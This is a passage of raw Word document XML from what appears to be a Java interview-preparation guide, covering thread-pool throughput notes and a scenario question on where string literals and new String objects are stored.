                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A376AC4" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Protects upstream systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="50362DBD" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387063C1" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Auto-Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AAFAABF" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Increases throughput capacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49858905" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2EDCD7D8">
          <v:rect id="_x0000_i1885" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E66B18" w14:textId="532858B7" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC00CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Notes</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA74F3B" w14:textId="6B8634A7" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To handle 1000 TPS with a 100-thread pool, I’d use bounded queues with backpressure, optimize pool size, or switch to async processing and scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399790A2" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="695147EB">
          <v:rect id="_x0000_i1886" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52955DF7" w14:textId="23B2E32E" w:rsidR="000753D5" w:rsidRPr="00CE4B95" w:rsidRDefault="000753D5" w:rsidP="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E0065" w14:textId="0FB78DE1" w:rsidR="00A82ACE" w:rsidRPr="00CE4B95" w:rsidRDefault="00A82ACE" w:rsidP="00A82ACE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc196307781"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scenario based Questions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w14:paraId="6A770A19" w14:textId="77777777" w:rsidR="00A920A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A920A9" w:rsidP="00A82ACE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9EECAA" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="302" w:name="_Toc196307782"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 1?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>
    </w:p>
    <w:p w14:paraId="17E9FFA4" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>String s1 = “abc”; and String s2 = new String(“abc”); Where will s1 and s2 be stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD3F4D" w14:textId="659BC240" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In the case of the two String declarations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2150F"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String s1 = "abc";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EC11C"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String s2 = new String("abc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC30ECA" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Where will s1 and s2 be stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B1707" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s1 = "abc":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F317F" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>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 xml:space="preserve">The string "abc" is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>literal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In Java, string literals are stored in a special memory area called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Intern Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AB9B0" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>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If the string "abc" is not already present in the pool, it is added. If it's already there, then s1 will point to the same string object in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B228BFF" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s2 = new String("abc"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761A79B" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>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 xml:space="preserve">Here, new String("abc") creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new string object</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the new keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867A36C" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>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The string literal "abc" is first looked up in the string pool, and if it's not already present, it's added. Then, new String("abc") creates a new String object in the heap, which is not part of the string pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF55653" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>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So, s2 points to a new String object on the heap, which contains the same value "abc" as the string in the pool, but they are not the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDA42A" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FBC64" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will point to a string in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interned string).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B4011" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will point to a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String object on the heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, created explicitly using the new keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121589D8"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Even though both s1 and s2 contain the same string value ("abc"), they point to different memory locations. Specifically, s1 points to the string pool, while s2 points to a new object in the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE3FA3D" w14:textId="5E8B8CED" w:rsidR="00FB246C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB246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1BB03BE">
          <v:rect id="_x0000_i1887" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4FE94D" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc196307783"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 2?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
    </w:p>
    <w:p w14:paraId="16B60FEF" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">       What is the output of the given Java code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DF8F2"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9453CD"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FAAED"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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p>
    <w:p w14:paraId="602D1C90"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADB1AE"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>method</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p>
    <w:p w14:paraId="4B86333B"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76684229"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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ethod</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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> o</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF1609"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD038D"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
